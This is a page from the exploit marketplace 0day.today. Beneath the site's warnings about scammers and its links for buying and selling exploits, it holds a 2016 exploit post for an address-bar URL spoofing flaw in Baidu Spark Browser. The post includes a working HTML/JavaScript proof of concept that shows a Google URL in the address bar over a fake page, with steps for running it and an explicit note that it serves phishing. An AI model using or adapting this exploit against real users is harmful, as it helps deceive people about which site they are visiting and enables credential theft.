0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Baidu Spark Browser 43.23.1000.476 - Address Bar URL Spoofing
<!-- Exploit Title: Baidu Spark Browser URL spoof vulnerability Date:2016-05-02 Exploit Author: liu zhu Vendor Homepage:http://en.browser.baidu.com/ <http://en.browser.baidu.com/>Software Link:http://en.browser.baidu.com/query/fullpackage.exe?lang=en Version:43.23.1000.476 Tested on:Win7/WinXP details: The baidu spark browser is vulnerable to Address Bar Spoofing in the latest version of the browser(43.23.1000.476). Using the specail javascript code it was able to spoof the URL in the address bar which could trick the user that he is visiting a different site than he thinks. it<http://thinks.it/> can be used to phinshing attack. PoC: ------------------------------------------------------------------------------------------------ --> <SCRIPT LANGUAGE="JavaScript"> function winopen() {OW=window.open("", "newwin"); OW.document.write("<TITLE>Google</TITLE>"); OW.document.write("<h1>The Phishing Page !!</h1>"); OW.document.close(); } </SCRIPT> <a href="https://www.google.com.hk/" target="newwin" onclick="setTimeout('winopen()', 1);">Google Home Page</a> <!-- ------------------------------------------------------------------------ Save it as a HTML file, and then execute it in Baidu Spark Browser. Affact: The vulnerability can be used to Phishing attack, Because the URL can be the same as the URL that the visitor wants to visit,but the content is fake. Contact: liuzhu09@huawei.com --> # 0day.today [2024-11-15] #